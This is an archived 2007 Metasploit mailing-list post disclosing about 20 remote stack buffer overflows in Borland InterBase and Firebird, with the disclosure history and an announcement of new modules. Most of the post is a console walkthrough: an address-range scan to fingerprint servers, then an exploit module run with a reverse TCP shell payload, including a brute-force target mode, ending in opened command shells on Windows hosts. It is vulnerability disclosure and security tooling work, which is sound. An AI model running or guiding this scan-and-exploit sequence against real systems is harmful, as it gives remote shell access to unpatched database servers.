Metasploit mailing list archives
InterBase/Firebird Fun
From: ramon at risesecurity.org (Ramon de Carvalho Valle)
Date: Fri, 05 Oct 2007 21:56:51 -0300
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 While developing an exploit module for a buffer overflow vulnerability published byTippingPoint in Borland InterBase, we decided to do a quick look into Borland InterBase code, and unfortunately, the results were no good. We found about 20 buffer overflow vulnerabilities that affects all versions of Borland InterBase, and some of them also affects the Firebird Relational Database. All remote, trivial to exploit, stack-based buffer overflows. We contacted both Borland/CodeGear and Firebird developers about these vulnerabilities. After failed attempts to find an email address to report security issues in their products, we tried their bug tracking systems. Borland/CodeGear asked us to send information to their support email address, but we didn't get any further responses. Firebird developers didn't answer to our reports either, but they corrected these vulnerabilities in the latest version of Firebird. We published the advisories, exploit modules for some of these vulnerabiliities, and an auxiliary scanner module for Metasploit Framework 3. The auxiliary scanner module searches for running InterBase/Firebird instances on an address range and retrieves version and implementation of the InterBase server from InterBase Services Manager. This auxiliary module can be used to determine the exact target will be used in an exploitation scenario. msf > use auxiliary/scanner/misc/ib_service_mgr_info msf auxiliary(ib_service_mgr_info) > set RHOSTS 192.168.213.0/24 RHOSTS => 192.168.213.0/24 msf auxiliary(ib_service_mgr_info) > run [*] Trying 192.168.213.0 [*] Trying 192.168.213.1 [*] Trying 192.168.213.2 ... [*] Trying 192.168.213.132 IP Address: 192.168.213.132 Version of the InterBase server: WI-V6.0.1.0 Implementation of the InterBase server: InterBase/x86/Windows NT ... [*] Trying 192.168.213.253 [*] Trying 192.168.213.254 [*] Trying 192.168.213.255 [*] Auxiliary module execution completed msf auxiliary(ib_service_mgr_info) > Using this information, one can select the exact target from one of our published exploit modules. msf auxiliary(ib_service_mgr_info) > use windows/misc/ib_isc_attach_database msf exploit(ib_isc_attach_database) > set RHOST 192.168.213.132 RHOST => 192.168.213.132 msf exploit(ib_isc_attach_database) > set LHOST 192.168.0.4 LHOST => 192.168.0.4 msf exploit(ib_isc_attach_database) > set PAYLOAD windows/shell_reverse_tcp PAYLOAD => windows/shell_reverse_tcp msf exploit(ib_isc_attach_database) > show targets Exploit targets: Id Name -- ---- 0 Brute Force 1 Borland InterBase WI-V8.1.0.257 2 Borland InterBase WI-V8.0.0.123 3 Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80 4 Borland InterBase WI-V7.0.1.1 5 Borland InterBase WI-V6.5.0.28 6 Borland InterBase WI-V6.0.1.6 7 Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0 8 Borland InterBase WI-V5.5.0.742 9 Borland InterBase WI-V5.1.1.680 10 Debug msf exploit(ib_isc_attach_database) > set TARGET 7 TARGET => 7 msf exploit(ib_isc_attach_database) > exploit [*] Started reverse handler [*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.4:33891) Microsoft Windows XP [vers?o 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> The brute force option assumes that ibguard/fbguard is running and tries every available target from an exploit module sequentially. msf exploit(ib_isc_attach_database) > set TARGET 0 TARGET => 0 msf exploit(ib_isc_attach_database) > exploit [*] Started reverse handler [*] Brute forcing with 10 possible targets [*] Trying target Borland InterBase WI-V8.1.0.257... [*] Trying target Borland InterBase WI-V8.0.0.123... [*] Trying target Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80... [*] Trying target Borland InterBase WI-V7.0.1.1... [*] Trying target Borland InterBase WI-V6.5.0.28... [*] Trying target Borland InterBase WI-V6.0.1.6... [*] Trying target Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0... [*] Command shell session 2 opened (192.168.0.4:4444 -> 192.168.0.4:33942) Microsoft Windows XP [vers?o 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> It is important to note that all Borland InterBase vulnerabilities published by us were not corrected by the vendor and are present in all (including the latest) versions of their product. The original blog post, advisories and modules can be found in our website at http://risesecurity.org/. Best regards, Ramon -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.6 (GNU/Linux) iD8DBQFHBt1TGIS0iEuhp4MRAqH9AJ9QM5N4mxxAe88uvc0YNGH5JU55kACgr4EI xwreRuy00uurdf/3bchwKAQ= =dV8W -----END PGP SIGNATURE-----
Current thread:
- InterBase/Firebird Fun Ramon de Carvalho Valle (Oct 05)